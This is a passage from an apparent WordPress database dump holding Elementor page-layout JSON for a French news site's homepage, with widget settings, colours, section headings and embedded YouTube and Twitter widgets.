sive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":71.469},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.53},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2409,771,'_elementor_version','0.4'),(2410,771,'_elementor_css','a:3:{s:4:\"time\";i:1509372159;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2412,772,'_elementor_edit_mode','builder'),(2413,772,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px